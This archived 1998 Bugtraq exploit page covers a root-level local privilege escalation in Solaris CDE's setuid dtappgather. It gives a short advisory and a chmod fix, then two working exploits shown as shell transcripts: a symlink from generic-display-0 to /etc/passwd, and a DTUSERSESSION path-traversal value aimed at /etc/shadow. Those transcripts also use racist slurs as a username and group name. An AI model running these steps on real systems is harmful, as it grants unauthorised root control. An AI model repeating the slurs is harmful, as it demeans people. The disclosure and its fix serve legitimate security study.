Solaris /usr/dt/bin/dtappgather symlink problem.

Summary
Description:Standard symlink problem allows arbitrary files to be chowned the the attacker's UID.
Author:Mastoras <mastoras@PAPARI.HACK.GR>
Compromise: root (local)
Vulnerable Systems:Solaris 2.5,2.5.1 running CDE version 1.0.2 with suid /usr/dt/bin/dtappgather
Date:23 February 1998
Details


Date: Mon, 23 Feb 1998 15:31:16 +0200
From: Mastoras <mastoras@PAPARI.HACK.GR>
To: BUGTRAQ@NETSPACE.ORG
Subject: /usr/dt/bin/dtappgather exploit

Buggy program:
        /usr/dt/bin/dtappgather

Description of the problem:
        Local users can change the ownership of any file, thus gaining
root priviledges. This happens because "dtappgather" does not check if the
file /var/dt/appconfig/appmanager/generic-display-0 is a symbolic link and
happily chown()s it to the user. When CERT released advisory CA-98.02
about /usr/dt/bin/dtappgather, I played a little with dtappgather and
discovered the problem above, but I thought that patch 104498-02 corrects it,
as described in SUN's section of 98.02. When I applied the patch, I
realised that it was still possible to gain root privs.

Systems Affected:
        *At least* SunOS 5.5 & 5.5.1 running CDE version 1.0.2 with suid
bit on /usr/dt/bin/dtappgather. SunOS 5.6 (or CDE 1.2) comes with
directory /var/dt/appconfig/appmanager/ mode 755 so it's not possible to
make the necessary link. On the other hand, in SunOS 5.5* this dir has
mode 777, so you can easily make the link or even unlink/rename the file
"generic-display-0" if exists owned by another user.

Quick Fix:
        chmod -s /usr/dt/bin/dtappgather

The Exploit:
        The forwarded exploit was initially posted to hack.gr's security
mailing list: "haxor".


Hack wisely,
Mastoras

        /*
         *  Computer Engineering & Informatics Department, Patras, Greece
         *  Mastor Wins, Fatality!      http://www.hack.gr/users/mastoras
         */

---------- Forwarded message ----------
Date: Sat, 24 Jan 1998 02:48:13 +0200 (EET)
From: Mastoras <mastoras@papari.hack.gr>
To: haxor@papari.hack.gr, Undisclosed recipients:  ;
Subject: [HAXOR:11] dtappgather exploit

Hello,

        I suppose you have learnt about CERT's advisory on dtappgather
program. Well, here's the exploit:

nigg0r@host% ls -l /etc/passwd
-r--r--r--   1 root     other        1585 Dec 17 22:26 /etc/passwd
nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
nigg0r@host% dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
nigg0r@host% ls -l /etc/passwd
-r-xr-xr-x   1 nigg0r   niggers      1585 Dec 17 22:26 /etc/passwd
nigg0r@host% echo "nigg0r wins! Fatality!" | mail root

        it would be easy to find the exploit if you had read CERT's advisory.
the following steps were enough..

% cp /usr/dt/bin/dtappgather .          [you can't "truss" suid proggies]
% truss -o koko ./dtappgather
% more koko
[ shity ld things ]
chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0
chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0
[ shitty things ]

        I hope this was not too lame or well-known :-)


Seeya,
mastoras

From spd@GTC1.CPS.UNIZAR.ES Wed May 13 01:20:27 1998 Date: Tue, 24 Feb 1998 20:30:20 +0100
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES> To: BUGTRAQ@NETSPACE.ORG
Subject: Re: /usr/dt/bin/dtappgather exploit

>
> I suppose you have learnt about CERT's advisory on dtappgather > program. Well, here's the exploit:
>
> nigg0r@host% ls -l /etc/passwd
> -r--r--r-- 1 root other 1585 Dec 17 22:26 /etc/passwd > nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0 > nigg0r@host% dtappgather

the exploit is much simpler than that.

hey, it's even documented on the man page :-)

Simply

$ id
uid=6969(foo) gid=666(bar)
$ ls -l /etc/shadow
-r-------- 1 root sys 234 Nov 7 1999 /etc/shadow $ env DTUSERSESSION=../../../../../../../etc/shadow dtappgather $ ls -l /etc/shadow
-r-xr-xr-x 1 foo bar 234 Nov 7 1999 /etc/shadow

Anyway, your exploit has an advantage: it works (at least, in solaris 2.5), even after patching CDE according to CERT advisory.
Solaris 2.6 seems to have the right permisions:

            /var/dt -> rwxr-xr-x
            /var/dt/appconfig -> rwxr-xr-x
            /var/dt/tmp -> rwxrwxrwt

--

    J.A. Gutierrez                                   So be easy and free
                                            when you're drinking with me
                                      I'm a man you don't meet every day
 finger me for PGP                                          (the pogues)
More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]